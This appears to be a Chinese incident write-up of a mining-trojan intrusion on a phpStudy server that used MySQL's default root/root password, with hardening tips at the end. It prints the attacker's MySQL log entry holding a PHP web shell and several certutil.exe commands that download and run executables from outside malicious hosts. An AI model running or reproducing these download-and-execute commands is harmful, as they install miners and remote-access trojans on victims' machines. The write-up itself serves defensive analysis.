針對phpStudy網站服務器的入侵

今天客戶服務器上出現報警,查找了下緣由,發現根目錄下有wk.phpphp

E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
         2173 Quit    
190207 18:31:59     2174 Connect    root@localhost on 
         2174 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2174 Init DB    mysql
         2174 Init DB    mysql
         2174 Query    SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>'
         2174 Query    SHOW VARIABLES LIKE 'language'
         2174 Quit    
190207 18:32:00     2175 Connect    root@localhost on 
         2175 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2175 Init DB    mysql
         2175 Init DB    mysql
         2175 Query    set global general_log='off'

查了下緣由,是針對phpStudy網站服務器進行批量入侵的挖礦木馬html

攻擊者對互聯網上的服務器進行批量掃描,發現易受攻擊的phpStudy系統後,利用用戶在安裝時未進行修改的MySQL弱密碼進行登陸,並進一步植入WebShell,而後經過shell下載挖礦木馬挖門羅幣。mysql

 

 中招主機經過phpStudy一鍵部署PHP環境,默認狀況下包含phpinfo及phpMyAdmin而且任何人均可以訪問,同時安裝的MySQL默認口令爲弱口令密碼root/root,且開啓在外網3306端口,在未設置安全組或者安全組爲放通全端口的狀況下,受到攻擊者對於phpStudy的針對性探測,而且暴露了其MySQL弱口令。web

特色:sql

  (1)都是經過探測phpStudy搭建的php環境進行攻擊shell

  (2)經過webshell植入挖礦木馬時,白利用certutil.exe安全

命令1服務器

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2工具

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

  (3)挖礦木馬經過bat腳本啓動,且礦機採用xmr-stak挖礦工具網站

  (4)在挖礦的同時植入大灰狼遠控木馬

安全建議:

  (1)修復系統漏洞

  (2)集成環境,在安裝結束後應及時修改MySQL密碼爲強密碼,最低密碼長度不要低於11位,組合最好是字母數字和符號;刪除l.php(探針文件),避免被黑客探測入侵

  (3)增長安全策略

參考:https://s.tencent.com/research/report/642.html

相關文章
相關標籤/搜索